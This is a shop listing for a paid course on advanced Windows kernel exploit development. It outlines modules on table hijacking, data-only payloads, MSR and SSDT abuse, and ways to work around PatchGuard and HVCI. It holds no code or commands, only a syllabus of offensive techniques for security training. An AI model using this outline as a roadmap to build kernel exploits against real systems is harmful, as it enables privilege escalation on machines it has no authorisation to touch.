1 1

Windows Kernel Exploitation [Advanced]

Windows Kernel Exploitation [Advanced]

€600 EUR
EUR €600 EUR
Sale Sold out

Instructor: Juan Sacco
Juan Sacco is a security researcher and exploit developer specializing in reverse engineering, exploit development, Windows kernel exploitation, and vulnerable driver analysis. He is the founder of Exploit Pack.

[LinkedIn] · [GitHub]

Windows Kernel Exploitation: Advanced is a practical, self-paced training focused on modern Windows kernel exploit development, advanced post-exploitation techniques, data-only payloads, table hijacking, and exploitation strategies designed for hardened Windows environments.

This is a hard-core hands-on course for students who already understand Windows kernel driver research and want to move into advanced exploit development, this training is not for the faint of heart.

This training builds on the Fundamentals course and moves from driver analysis and primitive discovery into advanced exploitation workflows. Students will study how kernel read/write primitives can be transformed into practical exploit chains, how Windows kernel dispatch tables and object structures can be abused, and how modern mitigations such as PatchGuard, HVCI, VBS, kCFG, kCET, SMEP, and SMAP influence exploit design.

The course focuses on realistic Windows 11 exploitation scenarios, including IRP Table hijacking, SSDT and Shadow SSDT research, MSR-based techniques, data-only attacks, ZwMapViewOfSection-based payloads, suspended-thread execution concepts, and Data-Only Gadget techniques.

Students will use WinDbg, Ghidra, Ret-Sync, IOCTL++, custom exploit templates, vulnerable Exploit Pack drivers, and advanced kernel research tooling.

Throughout the course, you will learn how to:

  • Analyze advanced Windows kernel exploitation primitives.
  • Turn kernel read/write access into practical exploit chains.
  • Understand the difference between code-execution payloads and data-only payloads.
  • Study Windows kernel dispatch paths, including SSDT, Shadow SSDT, MSR-based dispatch, and IRP-related structures.
  • Analyze table hijacking techniques involving IDT, MSR, SSDT, Shadow SSDT, GDT, and driver-specific dispatch structures.
  • Understand why older persistent hooking techniques are fragile on modern Windows and how transient techniques differ.
  • Develop exploitation strategies that account for PatchGuard, HVCI, VBS, kCFG, kCET, SMEP, SMAP, and NX.
  • Analyze kernel objects, handle tables, access tokens, process structures, thread structures, and object metadata.
  • Use WinDbg to inspect kernel structures, processes, handles, threads, tokens, page tables, and dispatch paths.
  • Use Ghidra and Ret-Sync to connect static analysis with live kernel execution.
  • Understand physical memory, virtual memory, address translation, CR3 walking, and page-table-aware exploitation.
  • Study MSR read/write primitives and MSR-related information leaks.
  • Analyze ZwTerminateProcess-style vulnerable driver exploitation.
  • Study ZwMapViewOfSection-based payloads.
  • Understand SSDT and Shadow SSDT exploit paths.
  • Explore data-only attacks that abuse trusted kernel logic rather than injecting new kernel code.
  • Use Data-Only Gadget concepts to locate, classify, and chain useful kernel data targets at runtime.

Core Focus Areas

The Advanced training focuses on practical Windows kernel exploitation workflows built around advanced primitive usage, data-only exploitation, and dispatch-path abuse.

Data-Only Payloads

Students will learn how data-only payloads achieve their effect by modifying privileged kernel state rather than injecting or executing attacker-controlled kernel code.

The course explains why data-only techniques remain relevant on hardened systems: modern mitigations are often designed to constrain code execution, control-flow redirection, executable mappings, and persistent patching, while the kernel must still trust and consume its own data structures during normal execution.

Students will study targets such as tokens, handle state, object flags, callback-related state, policy fields, and dispatch-relevant data.

Table Hijacking and Dispatch Abuse

The course covers table hijacking as a way to transform data corruption or write primitives into controlled dispatch behavior.

Students will study IDT, MSR, SSDT, Shadow SSDT, GDT, and IRP-related structures, with emphasis on the practical differences between historical techniques, modern transient techniques, and driver-specific dispatch targets.

The training also covers why IRP and driver-specific dispatch structures are often more practical than global kernel table tampering on modern Windows systems.

MSR-Based Techniques

Students will analyze MSR read/write primitives, including how MSR exposure appears in vulnerable drivers and why MSR-related access can become a powerful primitive.

The course discusses syscall-related MSRs, MSR read information leaks, MSR table hijacking concepts, and how VBS/HVCI changes the practicality of MSR abuse on modern Windows systems.

SSDT and Shadow SSDT Exploitation

Students will study the native SSDT and Shadow SSDT as kernel dispatch surfaces.

The course explains how native system calls flow through ntoskrnl and how GUI/win32k-related system calls flow through the Shadow SSDT. Students will analyze how these paths can be studied, debugged, and used in controlled lab exploitation scenarios.

ZwMapViewOfSection Payloads

The training includes advanced ZwMapViewOfSection-based payloads, including data-only payloads, SSDT-oriented payloads, and Shadow SSDT-oriented payloads.

Students will learn how memory mapping behavior can become part of a larger exploit strategy and how these techniques interact with modern mitigation constraints.

Data-Only Gadgets

Students will study DOG, short for Data-Only Gadgets, as a framework for using existing kernel read/write primitives to locate, classify, and chain useful kernel data targets at runtime.

The course introduces the idea of kernel gadgets as legitimate kernel code paths or data structures that can be repurposed into exploit building blocks without relying on traditional shellcode or ROP-style payloads.

Topics Included

The training covers:

  • Windows kernel architecture review
  • Windows system call flow
  • Native APIs, Nt/Zw routines, and syscall dispatch
  • SSDT and Shadow SSDT concepts
  • Process-scoped kernel breakpoints
  • Debugging native system calls with WinDbg
  • Debugging win32k / GUI system calls
  • Advanced WinDbg workflows
  • Advanced Ghidra workflows
  • Ret-Sync for static and dynamic correlation
  • Kernel objects, handle tables, and access tokens
  • EPROCESS, ETHREAD, KTHREAD, TOKEN, OBJECT_HEADER, HANDLE_TABLE, IRP, DRIVER_OBJECT, and DEVICE_OBJECT
  • Physical memory, virtual memory, and address translation
  • CR3 walking and page-table-aware exploitation
  • Superfetch and memory discovery concepts
  • Kernel read/write primitive design
  • Virtual address and physical address primitives
  • MSR read/write primitives
  • WRMSR and RDMSR exposure through vulnerable drivers
  • IOCTL++ advanced debugging workflows
  • WinDbg IOCTL plugin workflows
  • ZwTerminateProcess exploit analysis
  • Table hijacking techniques
  • IDT, MSR, SSDT, Shadow SSDT, GDT, and IRP-related dispatch structures
  • Data-only payloads
  • Token and object-state manipulation concepts
  • Callback and policy-state manipulation concepts
  • MSR read information leak exploitation
  • Suspended-thread payload concepts
  • MSR table hijacking concepts
  • ZwMapViewOfSection data-only payloads
  • ZwMapViewOfSection SSDT payloads
  • ZwMapViewOfSection Shadow SSDT payloads
  • Data-Only Gadget discovery and chaining
  • PatchGuard-aware exploit design
  • HVCI-aware exploit design
  • VBS and VTL0/VTL1 security implications
  • kASLR, NX, SMEP, SMAP, kCFG, kCET, PatchGuard, and HVCI
  • Transient modification versus persistent tampering
  • Exploit reliability, cleanup, and system stability considerations

Example Training Content

One of the advanced lessons introduces table hijacking techniques and compares IDT, MSR, SSDT, Shadow SSDT, GDT, and IRP-related structures as possible exploitation targets.

Students learn why classic global table tampering is increasingly fragile on modern Windows, why PatchGuard and HVCI change the practical value of older techniques, and why transient modifications and driver-specific dispatch structures are often more realistic in modern exploit chains.

Another lesson introduces data-only payloads and explains how an exploit can achieve privileged effects by modifying trusted kernel data instead of executing injected kernel code. The training uses this idea to connect kernel objects, tokens, handle state, callbacks, and policy fields to modern exploit design.

The final advanced section introduces Data-Only Gadget techniques, where an existing kernel read/write primitive is used to discover offsets, classify useful kernel objects, and build reusable data-oriented chains at runtime.

Course Structure

Module 1: Advanced Kernel Internals and Dispatch Paths

This module reviews the Windows kernel execution model from an exploitation perspective and focuses on the paths that connect user-mode activity to privileged kernel behavior.

Students will revisit system calls, native APIs, Nt/Zw routines, SSDT, Shadow SSDT, kernel objects, handle tables, access tokens, and the structures that become important once an exploit has a kernel read/write primitive.

Module 2: Advanced Primitive Usage and Memory Translation

This module focuses on transforming kernel read/write capabilities into stable exploitation building blocks.

Students will study virtual memory, physical memory, CR3, page-table walking, VA/PA translation, and the practical differences between virtual and physical memory primitives.

Module 3: MSR Primitives and Syscall-Entry Research

This module focuses on MSR-related exploitation concepts and vulnerable drivers that expose MSR read/write capabilities.

Students will study MSR read information leaks, syscall-related MSRs, WRMSR/RDMSR exposure, and the practical impact of VBS and HVCI on MSR-based techniques.

Module 4: Table Hijacking and Dispatch-State Exploitation

This module introduces advanced dispatch-path abuse and table hijacking techniques.

Students will study the historical and modern relevance of IDT, MSR, SSDT, Shadow SSDT, GDT, IRP-related structures, driver dispatch tables, completion routines, callback fields, and private operation tables.

Module 5: Data-Only Payloads and Kernel Object Manipulation

This module focuses on data-only exploitation.

Students will learn how an exploit can achieve meaningful effects by modifying trusted kernel data consumed by normal kernel code, avoiding the need for injected code or direct control-flow hijacking.

Module 6: ZwMapViewOfSection and Advanced Payload Construction

This module focuses on advanced payload construction using ZwMapViewOfSection and related dispatch paths.

Students will study how section mapping, memory views, and system-call dispatch can become part of an advanced exploit strategy.

Module 7: Data-Only Gadgets and DOG

This module introduces Data-Only Gadget techniques and DOG-based workflows.

Students will learn how existing kernel read/write primitives can be connected to runtime discovery, structure walking, offset recovery, gadget classification, and data-oriented chain construction.

Hands-On Exercises and Materials

Students will practice against controlled lab environments, vulnerable drivers, and advanced exploit templates, including:

  • Exploit Pack drivers created for the course
  • Advanced vulnerable driver samples
  • Real-world vulnerable driver case studies
  • IOCTL debugging exercises
  • MSR primitive analysis labs
  • Kernel read/write primitive labs
  • Physical memory and virtual memory labs
  • SSDT and Shadow SSDT analysis labs
  • ZwTerminateProcess exploit analysis
  • ZwMapViewOfSection payload labs
  • Table hijacking research exercises
  • Data-only payload exercises
  • DOG / Data-Only Gadget discovery exercises
  • PatchGuard-aware and HVCI-aware exploitability labs
  • WinDbg and Ghidra correlation exercises
  • Ret-Sync synchronization exercises

Tools and Takeaways

Participants will receive access to tools and materials used throughout the course, including:

  • IOCTL++
  • Exploit templates
  • Advanced vulnerable driver samples
  • WinDbg helpers
  • Ghidra scripts and plugins
  • Ret-Sync workflow material
  • Driver analysis scripts
  • Kernel read/write primitive templates
  • MSR analysis helpers
  • DOG / Data-Only Gadget material
  • Offset and structure discovery helpers
  • Lab notes and supporting documentation
  • Additional tooling for vulnerability discovery and exploit development

Schedule and Delivery

Format: Pre-recorded, self-paced training
Structure: Advanced modules with video lessons, hands-on exercises, downloadable tools, and supporting materials
Exercises: Practical labs included throughout the course
Access: Learn at your own pace and revisit the material as needed

Support and Community

Students receive access to the dedicated Discord training channel, where they can share progress, ask questions, troubleshoot labs, and collaborate with instructors and other participants.

Who This Training Is For

This training is intended for:

  • Security researchers
  • Reverse engineers
  • Exploit developers
  • Kernel vulnerability researchers
  • Malware analysts
  • Red-team operators
  • Advanced Windows internals students
  • Researchers who already understand driver debugging and want to move into advanced exploit development
  • Engineers interested in modern Windows kernel mitigation-aware exploitation

Recommended Background

Students should already be comfortable with the material covered in the Fundamentals course or have equivalent experience.

Recommended knowledge:

  • Windows kernel debugging with WinDbg
  • Basic driver internals
  • IRPs and IOCTLs
  • Ghidra or IDA-based reverse engineering
  • x64 assembly
  • C or C++ systems programming
  • Windows internals
  • Kernel objects, processes, threads, and tokens
  • Basic exploit development concepts
  • Familiarity with physical memory and MSR primitives is strongly recommended.

Learning Outcomes

By the end of the training, students will be able to:

  • Analyze advanced Windows kernel exploitation primitives.
  • Understand how kernel read/write primitives can be transformed into exploit chains.
  • Reason about virtual memory, physical memory, CR3, and address translation.
  • Analyze MSR read/write exposure in vulnerable drivers.
  • Understand SSDT and Shadow SSDT dispatch paths.
  • Evaluate table hijacking techniques under modern Windows mitigations.
  • Build mitigation-aware exploitation strategies.
  • Understand data-only payloads and why they remain relevant on hardened systems.
  • Analyze token, handle, callback, object, and policy-related kernel state.
  • Understand ZwMapViewOfSection-based payload strategies.
  • Use WinDbg, Ghidra, and Ret-Sync in advanced kernel exploit workflows.
  • Use Data-Only Gadget concepts to locate and chain useful kernel data targets.
  • Evaluate the practical impact of PatchGuard, HVCI, VBS, kCFG, kCET, SMEP, SMAP, and NX.
  • Design exploit workflows that prioritize reliability, cleanup, and target-specific mitigation awareness.

 
View full details

You may also like..